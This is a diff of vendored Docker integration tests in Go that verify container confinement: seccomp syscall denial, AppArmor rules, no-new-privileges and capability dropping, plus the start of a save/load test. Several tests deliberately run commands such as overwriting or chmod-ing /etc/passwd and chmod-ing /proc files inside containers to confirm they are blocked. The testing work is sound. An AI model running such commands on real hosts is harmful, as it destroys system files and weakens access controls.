+func (s *DockerSuite) TestRunSeccompProfileDenyUnshare(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor) + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "unshare", + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + if err != nil { + c.Fatal(err) + } + defer tmpFile.Close() + + if _, err := tmpFile.Write([]byte(jsonData)); err != nil { + c.Fatal(err) + } + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc") + out, _, _ := runCommandWithOutput(runCmd) + if !strings.Contains(out, "Operation not permitted") { + c.Fatalf("expected unshare with seccomp profile denied to fail, got %s", out) + } +} + +// TestRunSeccompProfileDenyChmod checks that 'docker run --security-opt seccomp=/tmp/profile.json busybox chmod 400 /etc/hostname' exits with operation not permitted. 
+func (s *DockerSuite) TestRunSeccompProfileDenyChmod(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "chmod", + "action": "SCMP_ACT_ERRNO" + }, + { + "name":"fchmod", + "action": "SCMP_ACT_ERRNO" + }, + { + "name": "fchmodat", + "action":"SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + + if _, err := tmpFile.Write([]byte(jsonData)); err != nil { + c.Fatal(err) + } + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "400", "/etc/hostname") + out, _, _ := runCommandWithOutput(runCmd) + if !strings.Contains(out, "Operation not permitted") { + c.Fatalf("expected chmod with seccomp profile denied to fail, got %s", out) + } +} + +// TestRunSeccompProfileDenyUnshareUserns checks that 'docker run debian:jessie unshare --map-root-user --user sh -c whoami' with a specific profile to +// deny unshare of a userns exits with operation not permitted. 
+func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor) + // from sched.h + jsonData := fmt.Sprintf(`{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "unshare", + "action": "SCMP_ACT_ERRNO", + "args": [ + { + "index": 0, + "value": %d, + "op": "SCMP_CMP_EQ" + } + ] + } + ] +}`, uint64(0x10000000)) + tmpFile, err := ioutil.TempFile("", "profile.json") + if err != nil { + c.Fatal(err) + } + defer tmpFile.Close() + + if _, err := tmpFile.Write([]byte(jsonData)); err != nil { + c.Fatal(err) + } + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami") + out, _, _ := runCommandWithOutput(runCmd) + if !strings.Contains(out, "Operation not permitted") { + c.Fatalf("expected unshare userns with seccomp profile denied to fail, got %s", out) + } +} + +// TestRunSeccompProfileDenyCloneUserns checks that 'docker run syscall-test' +// with the default seccomp profile exits with operation not permitted. +func (s *DockerSuite) TestRunSeccompProfileDenyCloneUserns(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + ensureSyscallTest(c) + + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "userns-test", "id") + out, _, err := runCommandWithOutput(runCmd) + if err == nil || !strings.Contains(out, "clone failed: Operation not permitted") { + c.Fatalf("expected clone userns with default seccomp profile denied to fail, got %s: %v", out, err) + } +} + +// TestRunSeccompUnconfinedCloneUserns checks that +// 'docker run --security-opt seccomp=unconfined syscall-test' allows creating a userns. 
+func (s *DockerSuite) TestRunSeccompUnconfinedCloneUserns(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, UserNamespaceInKernel, NotUserNamespace, unprivilegedUsernsClone) + ensureSyscallTest(c) + + // make sure running w privileged is ok + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "syscall-test", "userns-test", "id") + if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") { + c.Fatalf("expected clone userns with --security-opt seccomp=unconfined to succeed, got %s: %v", out, err) + } +} + +// TestRunSeccompAllowPrivCloneUserns checks that 'docker run --privileged syscall-test' +// allows creating a userns. +func (s *DockerSuite) TestRunSeccompAllowPrivCloneUserns(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, UserNamespaceInKernel, NotUserNamespace) + ensureSyscallTest(c) + + // make sure running w privileged is ok + runCmd := exec.Command(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id") + if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") { + c.Fatalf("expected clone userns with --privileged to succeed, got %s: %v", out, err) + } +} + +// TestRunSeccompProfileAllow32Bit checks that 32 bit code can run on x86_64 +// with the default seccomp profile. +func (s *DockerSuite) TestRunSeccompProfileAllow32Bit(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, IsAmd64) + ensureSyscallTest(c) + + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "exit32-test", "id") + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("expected to be able to run 32 bit code, got %s: %v", out, err) + } +} + +// TestRunSeccompAllowSetrlimit checks that 'docker run debian:jessie ulimit -v 1048510' succeeds. 
+func (s *DockerSuite) TestRunSeccompAllowSetrlimit(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + // ulimit uses setrlimit, so we want to make sure we don't break it + runCmd := exec.Command(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510") + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("expected ulimit with seccomp to succeed, got %s: %v", out, err) + } +} + +func (s *DockerSuite) TestRunSeccompDefaultProfileAcct(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, NotUserNamespace) + ensureSyscallTest(c) + + out, _, err := dockerCmdWithError("run", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "Operation not permitted") { + c.Fatalf("test 0: expected Operation not permitted, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "sys_admin", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "Operation not permitted") { + c.Fatalf("test 1: expected Operation not permitted, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "sys_pacct", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("test 2: expected No such file or directory, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("test 3: expected No such file or directory, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-drop", "ALL", "--cap-add", "sys_pacct", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("test 4: expected No such file or directory, got: %s", out) + } +} + +func (s *DockerSuite) TestRunSeccompDefaultProfileNS(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, NotUserNamespace) + ensureSyscallTest(c) + + out, _, err := 
dockerCmdWithError("run", "syscall-test", "ns-test", "echo", "hello0") + if err == nil || !strings.Contains(out, "Operation not permitted") { + c.Fatalf("test 0: expected Operation not permitted, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "sys_admin", "syscall-test", "ns-test", "echo", "hello1") + if err != nil || !strings.Contains(out, "hello1") { + c.Fatalf("test 1: expected hello1, got: %s, %v", out, err) + } + + out, _, err = dockerCmdWithError("run", "--cap-drop", "all", "--cap-add", "sys_admin", "syscall-test", "ns-test", "echo", "hello2") + if err != nil || !strings.Contains(out, "hello2") { + c.Fatalf("test 2: expected hello2, got: %s, %v", out, err) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "syscall-test", "ns-test", "echo", "hello3") + if err != nil || !strings.Contains(out, "hello3") { + c.Fatalf("test 3: expected hello3, got: %s, %v", out, err) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "--security-opt", "seccomp=unconfined", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("test 4: expected No such file or directory, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "--security-opt", "seccomp=unconfined", "syscall-test", "ns-test", "echo", "hello4") + if err != nil || !strings.Contains(out, "hello4") { + c.Fatalf("test 5: expected hello4, got: %s, %v", out, err) + } +} + +// TestRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents +// effective uid transitions on executing setuid binaries. 
+func (s *DockerSuite) TestRunNoNewPrivSetuid(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) + ensureNNPTest(c) + + // test that running a setuid binary results in no effective uid transition + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000", "nnp-test", "/usr/bin/nnp-test") + if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "EUID=1000") { + c.Fatalf("expected output to contain EUID=1000, got %s: %v", out, err) + } +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChown(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_CHOWN + runCmd := exec.Command(dockerBinary, "run", "busybox", "chown", "100", "/tmp") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_CHOWN + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_CHOWN + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesDacOverride(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_DAC_OVERRIDE + runCmd := exec.Command(dockerBinary, "run", "busybox", "sh", "-c", "echo test > /etc/passwd") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability 
CAP_DAC_OVERRIDE + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Permission denied") + // TODO test that root user can drop default capability CAP_DAC_OVERRIDE +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesFowner(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_FOWNER + runCmd := exec.Command(dockerBinary, "run", "busybox", "chmod", "777", "/etc/passwd") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_FOWNER + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // TODO test that root user can drop default capability CAP_FOWNER +} + +// TODO CAP_KILL + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetuid(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_SETUID + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setuid-test") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_SETUID + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_SETUID + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setuid", "syscall-test", 
"setuid-test") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetgid(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_SETGID + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setgid-test") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_SETGID + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_SETGID + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +// TODO CAP_SETPCAP + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetBindService(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_NET_BIND_SERVICE + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "socket-test") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_NET_BIND_SERVICE + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Permission denied") + // test that root user can drop default capability CAP_NET_BIND_SERVICE + runCmd = 
exec.Command(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Permission denied") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetRaw(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_NET_RAW + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "raw-test") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_NET_RAW + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_NET_RAW + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChroot(c *check.C) { + testRequires(c, DaemonIsLinux) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_SYS_CHROOT + runCmd := exec.Command(dockerBinary, "run", "busybox", "chroot", "/", "/bin/true") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_SYS_CHROOT + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default 
capability CAP_SYS_CHROOT + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestUserNoEffectiveCapabilitiesMknod(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + ensureSyscallTest(c) + + // test that a root user has default capability CAP_MKNOD + runCmd := exec.Command(dockerBinary, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2") + _, _, err := runCommandWithOutput(runCmd) + c.Assert(err, check.IsNil) + // test that non root user does not have default capability CAP_MKNOD + runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2") + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") + // test that root user can drop default capability CAP_MKNOD + runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2") + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +// TODO CAP_AUDIT_WRITE +// TODO CAP_SETFCAP + +func (s *DockerSuite) TestRunApparmorProcDirectory(c *check.C) { + testRequires(c, SameHostDaemon, Apparmor) + + // running w seccomp unconfined tests the apparmor profile + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup") + if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) { + c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", out, err) + } + + runCmd = 
exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current") + if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) { + c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", out, err) + } +} + +// make sure the default profile can be successfully parsed (using unshare as it is +// something which we know is blocked in the default profile) +func (s *DockerSuite) TestRunSeccompWithDefaultProfile(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + out, _, err := dockerCmdWithError("run", "--security-opt", "seccomp=../profiles/seccomp/default.json", "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "unshare: unshare failed: Operation not permitted") +} + +// TestRunDeviceSymlink checks run with device that follows symlink (#13840 and #22271) +func (s *DockerSuite) TestRunDeviceSymlink(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm, SameHostDaemon) + if _, err := os.Stat("/dev/zero"); err != nil { + c.Skip("Host does not have /dev/zero") + } + + // Create a temporary directory to create symlink + tmpDir, err := ioutil.TempDir("", "docker_device_follow_symlink_tests") + c.Assert(err, checker.IsNil) + + defer os.RemoveAll(tmpDir) + + // Create a symbolic link to /dev/zero + symZero := filepath.Join(tmpDir, "zero") + err = os.Symlink("/dev/zero", symZero) + c.Assert(err, checker.IsNil) + + // Create a temporary file "temp" inside tmpDir, write some data to "tmpDir/temp", + // then create a symlink "tmpDir/file" to the temporary file "tmpDir/temp". 
+ tmpFile := filepath.Join(tmpDir, "temp") + err = ioutil.WriteFile(tmpFile, []byte("temp"), 0666) + c.Assert(err, checker.IsNil) + symFile := filepath.Join(tmpDir, "file") + err = os.Symlink(tmpFile, symFile) + c.Assert(err, checker.IsNil) + + // Create a symbolic link to /dev/zero, this time with a relative path (#22271) + err = os.Symlink("zero", "/dev/symzero") + if err != nil { + c.Fatal("/dev/symzero creation failed") + } + // We need to remove this symbolic link here as it is created in /dev/, not temporary directory as above + defer os.Remove("/dev/symzero") + + // md5sum of 'dd if=/dev/zero bs=4K count=8' is bb7df04e1b0a2570657527a7e108ae23 + out, _ := dockerCmd(c, "run", "--device", symZero+":/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum") + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "bb7df04e1b0a2570657527a7e108ae23", check.Commentf("expected output bb7df04e1b0a2570657527a7e108ae23")) + + // symlink "tmpDir/file" to a file "tmpDir/temp" will result in an error as it is not a device. 
+ out, _, err = dockerCmdWithError("run", "--device", symFile+":/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum") + c.Assert(err, check.NotNil) + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "not a device node", check.Commentf("expected output 'not a device node'")) + + // md5sum of 'dd if=/dev/zero bs=4K count=8' is bb7df04e1b0a2570657527a7e108ae23 (this time check with relative path backed, see #22271) + out, _ = dockerCmd(c, "run", "--device", "/dev/symzero:/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum") + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "bb7df04e1b0a2570657527a7e108ae23", check.Commentf("expected output bb7df04e1b0a2570657527a7e108ae23")) +} + +// TestRunPIDsLimit makes sure the pids cgroup is set with --pids-limit +func (s *DockerSuite) TestRunPIDsLimit(c *check.C) { + testRequires(c, pidsLimit) + + file := "/sys/fs/cgroup/pids/pids.max" + out, _ := dockerCmd(c, "run", "--name", "skittles", "--pids-limit", "4", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "4") + + out = inspectField(c, "skittles", "HostConfig.PidsLimit") + c.Assert(out, checker.Equals, "4", check.Commentf("setting the pids limit failed")) +} + +func (s *DockerSuite) TestRunPrivilegedAllowedDevices(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + file := "/sys/fs/cgroup/devices/devices.list" + out, _ := dockerCmd(c, "run", "--privileged", "busybox", "cat", file) + c.Logf("out: %q", out) + c.Assert(strings.TrimSpace(out), checker.Equals, "a *:* rwm") +} + +func (s *DockerSuite) TestRunUserDeviceAllowed(c *check.C) { + testRequires(c, DaemonIsLinux) + + fi, err := os.Stat("/dev/snd/timer") + if err != nil { + c.Skip("Host does not have /dev/snd/timer") + } + stat, ok := fi.Sys().(*syscall.Stat_t) + if !ok { + c.Skip("Could not stat /dev/snd/timer") + } + + file := "/sys/fs/cgroup/devices/devices.list" + out, _ := dockerCmd(c, "run", "--device", 
"/dev/snd/timer:w", "busybox", "cat", file) + c.Assert(out, checker.Contains, fmt.Sprintf("c %d:%d w", stat.Rdev/256, stat.Rdev%256)) +} + +func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "names": ["chmod", "fchmod", "fchmodat"], + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + _, err = tmpFile.Write([]byte(jsonData)) + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "chmod", + "names": ["fchmod", "fchmodat"], + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + _, err = tmpFile.Write([]byte(jsonData)) + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "'name' and 'names' were specified in the seccomp profile, use either 'name' or 'names'") +} + +func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + jsonData := `{ + "archMap": [ + { + "architecture": "SCMP_ARCH_X86_64", + "subArchitectures": [ + "SCMP_ARCH_X86", + 
"SCMP_ARCH_X32" + ] + } + ], + "architectures": [ + "SCMP_ARCH_X32" + ], + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "names": ["chmod", "fchmod", "fchmodat"], + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + _, err = tmpFile.Write([]byte(jsonData)) + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "'architectures' and 'archMap' were specified in the seccomp profile, use either 'architectures' or 'archMap'") +} + +func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + // 1) verify I can run containers with the Docker default shipped profile which allows chmod + _, err = s.d.Cmd("run", "busybox", "chmod", "777", ".") + c.Assert(err, check.IsNil) + + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "chmod", + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + _, err = tmpFile.Write([]byte(jsonData)) + c.Assert(err, check.IsNil) + + // 2) restart the daemon and add a custom seccomp profile in which we deny chmod + err = s.d.Restart("--seccomp-profile=" + tmpFile.Name()) + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "busybox", "chmod", "777", ".") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Operation not permitted") +} + +func (s *DockerSuite) TestRunWithNanoCPUs(c *check.C) { + testRequires(c, cpuCfsQuota, cpuCfsPeriod) + + file1 := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us" + file2 := "/sys/fs/cgroup/cpu/cpu.cfs_period_us" + out, _ := dockerCmd(c, "run", "--cpus", "0.5", "--name", "test", "busybox", "sh", 
"-c", fmt.Sprintf("cat %s && cat %s", file1, file2)) + c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000") + + out = inspectField(c, "test", "HostConfig.NanoCpus") + c.Assert(out, checker.Equals, "5e+08", check.Commentf("setting the Nano CPUs failed")) + out = inspectField(c, "test", "HostConfig.CpuQuota") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0")) + out = inspectField(c, "test", "HostConfig.CpuPeriod") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0")) + + out, _, err := dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Conflicting options: Nano CPUs and CPU Period cannot both be set") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go new file mode 100644 index 0000000000..70139a59bc --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go @@ -0,0 +1,383 @@ +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "reflect" + "regexp" + "sort" + "strings" + "time" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// save a repo using gz compression and try to load it using stdout +func (s *DockerSuite) TestSaveXzAndLoadRepoStdout(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "test-save-xz-and-load-repo-stdout" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + repoName := "foobar-save-load-test-xz-gz" + out, _ := dockerCmd(c, "commit", name, repoName) + + dockerCmd(c, "inspect", repoName) + + repoTarball, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName), + exec.Command("xz", "-c"), + exec.Command("gzip", "-c")) + 
c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err)) + deleteImages(repoName) + + loadCmd := exec.Command(dockerBinary, "load") + loadCmd.Stdin = strings.NewReader(repoTarball) + out, _, err = runCommandWithOutput(loadCmd) + c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out)) + + after, _, err := dockerCmdWithError("inspect", repoName) + c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after)) +} + +// save a repo using xz+gz compression and try to load it using stdout +func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "test-save-xz-gz-and-load-repo-stdout" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + repoName := "foobar-save-load-test-xz-gz" + dockerCmd(c, "commit", name, repoName) + + dockerCmd(c, "inspect", repoName) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName), 